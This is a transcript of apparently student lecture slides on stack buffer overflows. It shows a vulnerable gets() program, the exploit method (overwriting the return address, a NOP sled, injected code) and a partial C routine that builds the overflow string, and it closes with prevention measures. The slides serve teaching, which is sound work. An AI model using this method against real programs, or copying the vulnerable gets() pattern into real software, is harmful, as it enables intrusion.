BUFFER OVERFLOW - PowerPoint PPT Presentation

1 / 11
About This Presentation
Title:

BUFFER OVERFLOW

Description:

Fill with the tailor-made code. Overflow the buffer (usually by passing as argument) ... StackGuard. Patch to make stack non-executable. Wrapper libraries ... – PowerPoint PPT presentation

Number of Views:67
Avg rating:3.0/5.0
Slides: 12
Provided by: esw1
Category:

less

Transcript and Presenter's Notes

Title: BUFFER OVERFLOW


1
  • BUFFER OVERFLOW
  • -Eswar Balasubramanian
  • ECE578

2
Precursor
  • How serious is this BO?
  • Number of Vulnerabilities in the past week 11
  • First Six vulnerabilities of 2002

3
Agenda
  • BO what is it?
  • About the stack
  • Exploit
  • Prevention

4
Buffer Overflow
  • Copying more data into a buffer than it could
    hold
  • char variable10
  • char safe8 AAAAAAAA
  • char unsafe30 AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  • strcpy(variable, safe)
  • strcpy(variable, insafe)

5
Stack
  • Used by Functions
  • Variables are allocated dynamically
  • esp and ebp adjusted accordingly
  • / vulnerable.c /
  • int main()
  • char buffer500
  • gets(buffer)
  • return 0
  • Ret from gets ? points to return 0

sfp
ret from gets
esp
buffer 500
ebp
sfp 4
ret 4
6
What Next?
  • To alter the return address to our liking
  • To place a tailor made code to do what we like
  • buffer sfp ret
  • xxxxxxxxxx xxxx xxxx
  • ? 500 ? 4 4
  • Algorithm
  • Copy the big string into the buffer area to
    overflow the sfp and ret
  • Overflow the ret such that the return address
    points to the beginning of the buffer
  • Upon completion the program will return to the
    place pointed by ret, which is altered to point
    to the beginning of the buffer.
  • This buffer will contain the code to do something
    we like

7
To Do
  • Calculate return address
  • Construct large string
  • Return address calculated by finding the stack
    pointer of gets()
  • Subtract a guessed value from esp

8
  • String initially filled entirely with the ret
    address
  • Beginning of the string with NOPs (1/3)
  • Fill with the tailor-made code
  • Overflow the buffer
  • (usually by passing as argument)

9
  • char bufferSIZE
  • ret esp - offset
  • // fill buffer with ret addr's
  • ptr buffer
  • addr_ptr (long )ptr
  • for(i0 iltSIZE i4)
  • (addr_ptr) ret
  • // fill first half of buffer with NOPs
  • for(i0 iltSIZE/2 i)
  • bufferi '\x90'
  •  // insert shellcode in the middle
  • ptr buffer ((SIZE/2) - (strlen(listDir)/2))
  • for(i0 iltstrlen(listDir) i)
  • (ptr) listDiri

10
  • EXECUTION

11
PREVENTION
  • Use strncat(), strncpy(), fgets()
  • StackGuard
  • Patch to make stack non-executable
  • Wrapper libraries
Write a Comment
User Comments (0)
About PowerShow.com